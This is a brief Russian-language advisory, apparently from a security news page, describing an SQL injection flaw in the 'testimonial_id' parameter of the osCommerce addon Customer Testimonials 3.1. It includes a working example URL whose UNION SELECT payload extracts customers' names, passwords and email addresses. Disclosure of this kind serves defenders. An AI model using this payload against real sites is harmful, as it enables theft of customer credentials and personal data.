Программа: osCommerce Addon Customer Testimonials 3.1

Уязвимость позволяет удаленному пользователю выполнить произвольные SQL команды в базе данных приложения. Уязвимость существует из-за недостаточной обработки входных данных в параметре «testimonial_id» сценарием customer_testimonials.php. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольные SQL команды в базе данных приложения.

Пример:

http://site.com/customer_testimonials.php?testimonial_id=99999+union+select+1, 2,concat(customers_lastname,0x3a,customers_password, 0x3a,customers_email_address),4,5,6,7,8+from+customers/*



Оставить мнение